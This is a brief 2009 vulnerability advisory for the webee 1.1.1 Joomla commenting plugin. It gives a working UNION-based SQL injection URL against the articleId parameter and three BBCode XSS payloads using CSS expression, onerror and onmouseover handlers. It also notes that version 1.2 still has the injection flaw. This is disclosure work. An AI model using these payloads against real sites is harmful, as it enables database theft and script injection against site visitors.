jeffchannell.com

webee 1.1.1 Multiple Vulnerabilities

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' is not sanitized.
    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- 
  2. [img] BBCode [color] Tag XSS

    [color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
  3. [url] BBCode [img] Tag XSS

    [img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
  4. [size] BBCode [url] Tag XSS

    [url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]

UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2

Timeline